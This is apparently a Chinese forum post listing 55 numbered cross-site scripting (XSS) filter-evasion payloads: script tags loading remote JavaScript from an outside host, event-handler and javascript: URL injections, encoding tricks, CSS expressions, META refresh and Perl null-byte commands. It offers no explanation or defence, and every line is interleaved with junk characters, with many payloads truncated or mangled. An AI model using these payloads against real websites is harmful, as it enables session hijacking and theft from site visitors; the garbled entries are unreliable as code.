(1)普通的XSS JavaScript注入
* B" E2 V7 v* y2 `$ h+ x<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
) g8 R5 m$ _' W# b' G$ Y5 m6 P(99)另类弹框: @; u1 [' i; ?6 ?( U% N8 i
<q/oncut=alert()>1
$ H+ M2 `9 W- P( ?& g0 i<s/onclick=alert()>b2 t# h; U/ x4 O/ G$ g! W: l1 J( u
<XSS=" onclick="alert(1)//">clickme</SSX=">
- v" ]) j: s2 E r. E6 u <zzz onclick=alert`1`>clickme</zzz> * T& J* |$ f8 V( \
<a onclick=alert`1`>clickme</a>9 o7 @$ q- v) i/ d
<a=">clickme</a=">
; m- X) t6 M* J* n6 H<a=">clickme</a>
2 u+ D4 m. X, Z3 X- A<z=">clickme</z=">
- w; m2 P3 N" B# ?* r% ~8 U' @$ V/ R<z onclick=alert`1`>clickme</z>/ `# e1 U' S4 J; R% d$ c0 v- o' h
3 n* z `% s: G: e7 g8 G
(2)IMG标签XSS使用JavaScript命令 z2 t! y! d. V( l* M
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
2 t D t% n& t/ s" V- [& R9 p! ~& a
P& D" j N0 K! n(3)IMG标签无分号无引号
, a9 R' d# M5 T! G<IMG SRC=javascript:alert(‘XSS’)>9 {, a; T0 o- B* \+ P; f
7 B# i) j1 t1 v+ u! z5 X
(4)IMG标签大小写不敏感$ a. f2 T0 l! _
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
% |0 s7 n6 `: {# F7 X$ a. i9 U: Z
(5)HTML编码(必须有分号)
5 \0 q W- i+ z. l9 r<IMG SRC=javascript:alert(“XSS”)>
# N0 K3 V; s& p+ ?; Z& d' c
5 V; N2 w. q3 ~4 l* G1 F0 y(6)修正缺陷IMG标签% M6 t! m- D! a- h# G K$ w
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
4 a# [1 X& R8 Y; _# i7 Y+ ^$ j9 w" M& f K; t7 R+ E
(7)formCharCode标签(计算器)+ Y+ u6 Q. K% q2 B, j% w
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
; @0 M, {7 t" G5 K" D0 B- @9 s/ h: o7 i; [3 U
(8)UTF-8的Unicode编码(计算器)- q: r; J; e2 a- y9 r
<IMG SRC=jav..省略..S')>8 X4 y/ e# F! s
5 { E. h v5 e2 f* v) U A+ D
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)2 z7 _3 m0 f5 U2 j4 L. r; G
<IMG SRC=jav..省略..S')>
2 D! r0 W% p' {& \% o3 n( S, T: a: v0 P4 I( \- H) R
(10)十六进制编码也是没有分号(计算器)% n) h- t g/ h) a' r
<IMG SRC=\'#\'" /span>) R9 M! Y' C2 I' |# R; ]
; P: S: M5 p# X, q+ Z(11)嵌入式标签,将Javascript分开( u+ x" C! a( W* p4 n# r; d
<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>! Y. Q" y( b' D
1 h* O0 m) S! q(12)嵌入式编码标签,将Javascript分开
" Z: R! R5 j" ?<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
+ x; l0 {. X9 n( D7 b0 J4 m+ N3 w4 v* M* d
(13)嵌入式换行符
0 X9 i: M9 r. m& S `$ @+ z V<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>
. ^) H. h3 ^- A7 [' v, v9 p( S/ z- K' k
(14)嵌入式回车
% T* c0 ]2 S% ^6 m7 E7 e- }5 U<IMG SRC=\'#\'" ascript:alert(‘XSS’);”>5 l2 j$ z! _+ V) w
7 X; o4 ?2 ]6 k* L/ G" o* K(15)嵌入式多行注入JavaScript,这是XSS极端的例子/ d5 p! _. X* B7 D J- U( G* ~: N
<IMG SRC=\'#\'" /span>; G+ S" e5 K# A( @/ J" n% ^( T
: O# q( _6 x5 K
(16)解决限制字符(要求同页面)
3 R' f7 c/ c" R5 ]6 O X<script>z=’document.’</script>8 t9 ~' i4 P$ y2 }) D7 Z7 ~/ B6 S) H
<script>z=z+’write(“‘</script>+ `. ]* C0 w: A* O: }% b) H& K6 D
<script>z=z+’<script’</script>
. {' S* S( J* ~4 G, |0 P<script>z=z+’ src=ht’</script>
( l5 R1 w. e) v- ?3 E<script>z=z+’tp://ww’</script>/ \( B8 a! p2 N" Y5 e
<script>z=z+’w.shell’</script>
, F6 P b# x$ J' [$ X2 V<script>z=z+’.net/1.’</script>
" `* D6 S; `! c# v' k<script>z=z+’js></sc’</script>
+ J4 x5 g6 u1 F& m# b+ t( k<script>z=z+’ript>”)’</script>
) u1 {1 V7 J' _% k! k- U2 Q! t+ B3 @<script>eval_r(z)</script>) G0 h/ d8 P2 S; n2 r* J* X6 A
$ @8 x j5 b9 N1 C' r. r m+ ~
(17)空字符
2 v- s Z' n, G4 f! fperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
: W ]* H0 l) y
+ @' G% q$ x, @( @( n(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
4 f! {8 h7 W! j/ yperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out) I. J# n9 ^! z
& z. W8 ]# N: |0 r6 p4 w7 i/ E(19)Spaces和meta前的IMG标签+ l5 o B, q* l: m, ?9 \3 ~
<IMG SRC=\'#\'" � javascript:alert(‘XSS’);”>
# i' b% M3 Q4 Y* u3 ~" ^) k) D2 ], i) Z3 Q2 g! }
(20)Non-alpha-non-digit XSS
6 ^( s8 J7 ~, S4 c" |7 y! ~<SCRIPT/XSS SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
R; p0 @) L* J0 E, c: K8 y5 ?. _1 V$ R
(21)Non-alpha-non-digit XSS to 24 H. j7 ], P- l" i
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
, D# s4 e; ~" h1 x, r) o j
: e) @3 x, E, Z5 B(22)Non-alpha-non-digit XSS to 3* d* f% G, l9 n( v: u# e U
<SCRIPT/SRC=\'#\'" /span>http://3w.org/XSS/xss.js”></SCRIPT>
. ~8 {7 ?; w' M6 @ }7 n, I& M+ {5 I% e* X4 O5 {' ?1 Z% S5 r- j3 r
(23)双开括号5 D, z( u: c W# b+ g2 z
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
. I# G3 J. a& {/ [& o! ~& n0 d# K( a1 P; Z! A( I* h3 g
(24)无结束脚本标记(仅火狐等浏览器)
" E$ B4 R; ^% L( J, ^3 B<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
9 j) ~' n; N& i N6 o; ]" {
2 l3 E+ p# b% F9 w* u(25)无结束脚本标记2
2 b) N! O, {! D<SCRIPT SRC=//3w.org/XSS/xss.js> |9 e N! }9 {" R& u
( j7 q) o+ z9 G+ g(26)半开的HTML/JavaScript XSS
5 ]4 B" b& m" a# R) ?, N& W% j8 k<IMG SRC=\'#\'" /span>
8 o( }6 N) N0 F8 y) X8 F, g& `, e
# W U# {% u `(27)双开角括号
4 ?: L n& |1 x- C( \6 H( h6 T- d<iframe src=http://3w.org/XSS.html <# R% s* t3 \5 \3 l7 V/ u3 W5 r
2 ?- a$ I. t$ d(28)无单引号 双引号 分号
, O8 C; K- C6 k<SCRIPT>a=/XSS/
' R! A2 |$ F) H8 {% ]alert(a.source)</SCRIPT>
: v( i* b1 o# ~: {: \+ P `/ H8 B1 t5 l$ `- a" y
(29)换码过滤的JavaScript' ~% K# j8 p7 v0 E3 J# x
\”;alert(‘XSS’);//
' [1 W2 t% \/ A& Y. [- {2 O+ x% {) q0 U9 a% X, |( j* t
(30)结束Title标签
. {; s( j! I% n) P6 Q/ t</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
* c- W! Q6 O" p) C9 y0 w. [( a0 z% H! z2 ]$ a, v
(31)Input Image
& B9 J# I3 H+ r: j/ O<INPUT SRC=\'#\'" /span>
# T' l. t% s+ @, J- W
3 H9 s; [4 i, @! s! f(32)BODY Image
0 g0 V0 \8 r8 j<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
9 \* B* A N2 I6 W1 x1 g8 k: v+ \' I
0 Q$ c2 h% R! w, g1 q9 L6 A(33)BODY标签
; o2 j: `7 \: O" [<BODY(‘XSS’)>6 h1 h; X$ D3 e4 q/ L0 @+ }9 v
6 H& M: X( T- ]; I _) d(34)IMG Dynsrc" I6 s* `3 ~1 ?/ T
<IMG DYNSRC=\'#\'" /span>/ S( B+ D+ i5 B7 P' P w# X
% F0 c+ y. H0 n# L2 k% `; z
(35)IMG Lowsrc P( K( N. q/ d8 ?
<IMG LOWSRC=\'#\'" /span>' h8 P( h* |3 |* r0 [) A4 @
* S7 ]3 z! J% {/ I9 i5 {(36)BGSOUND c$ \, j" A9 y) T; ]* O/ V
<BGSOUND SRC=\'#\'" /span>
! g9 Y- H y1 N0 q4 g5 Y* r/ {# S+ U- U; b7 I" H
(37)STYLE sheet
; F7 Y( V1 q% L7 ^: d+ j<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>7 o3 D, c% t* K" ?0 [ A" J ~
( U, v/ `- l! g# h9 `8 `( l; e* H
(38)远程样式表2 Y' |# g+ M* {2 ~
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>8 u' K/ k7 }3 E2 @
- H# ^" c5 B& [& h
(39)List-style-image(列表式)
' q9 T! ~" g: i/ H<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
X; z5 i' l0 G F5 `5 w
. J/ o; ]( i+ T7 _) M! Y4 Q" q(40)IMG VBscript/ s9 e$ W1 R8 w. z) e) ~
<IMG SRC=\'#\'" /STYLE><UL><LI>XSS( |8 w. f6 z+ S$ V
+ O: x3 M( I2 M0 d) o1 Z(41)META链接url
8 U6 z' M7 C4 m0 e3 v. N<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>
/ `2 W" e' `& B: \0 t. M% U
1 Y6 j9 M# Y l0 ^* K4 U4 m" A(42)Iframe
$ G c$ |; M# e- X/ T3 x<IFRAME SRC=\'#\'" /IFRAME>
( X! k) X3 J u1 u
& x: h7 A6 W& ]' x9 E(43)Frame" q, f2 w& j8 p
<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>' f O$ l! x d8 g2 b x
. ?' {3 k" m2 S, @(44)Table
& C: Z1 Y2 a( v7 R9 y& I+ Y) B<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>1 V8 T$ X/ c3 j! M
2 K# J5 h0 r: \0 A& r; g+ g- |
(45)TD
# S* m# z5 {; W<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>/ C g- c$ J9 o
) |( |4 J- H% a! I" W+ E* w(46)DIV background-image
- ~! }, B( k- g) T' p0 D' i$ _- n<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>, I% r& \5 ~; X
: u& @' r$ Q) g) F/ `) t* [(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279), C5 P6 E7 ^8 D" T1 g+ L
<DIV STYLE=”background-image: url(�javascript:alert(‘XSS’))”>; L1 X$ c0 D [/ r7 P' | p6 Y
3 X) N0 N; K, U- A9 B(48)DIV expression' I. U+ t& i' P+ ^: S1 _
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
C/ ^) z& J+ V! Y9 I4 Z
1 v2 k# g2 v$ L# _- s(49)STYLE属性分拆表达
% I8 @: Z/ V- N' b- t! [<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
) q% X& n. E2 j# u i5 n) E/ Q
& N7 p0 H0 F( ]# W y1 K(50)匿名STYLE(组成:开角号和一个字母开头) _$ ~# n/ i( L0 w- I/ f8 }
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" t2 g- J' y" n& ?& p5 D, ]- `3 z% c( b5 y
(51)STYLE background-image: s! i& a) W4 w8 y$ w/ S% I
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>: @' M- k# i" w( Q
+ a* r% e) g) ?(52)IMG STYLE方式+ P' M9 V6 g$ o( h5 t' p8 U
exppression(alert(“XSS”))’>5 X$ s0 h/ ~. E) M
% Y" N0 Y: b; s3 b+ ^(53)STYLE background
! e! r) v R$ s, ^2 [1 ^- w% b<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
7 s9 F+ T5 p; a7 |- i3 ?7 }
; R" Y6 P2 I: |3 \(54)BASE
6 o) } M {/ r$ K$ q7 B, {<BASE HREF=”javascript:alert(‘XSS’);//”>
5 S& `3 Z8 R+ n! [. [: R# s1 {$ \8 H# b, J% w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
8 e" Q) [0 i5 _. F' z; P6 l<EMBED SRC=\'#\'" /span>http://3w.org/XSS/xss.swf” ></EMBED>( ?) o! k3 _. I6 i O/ B& i6 o
|
发表于 2016-4-28 10:06:15
收藏
支持
反对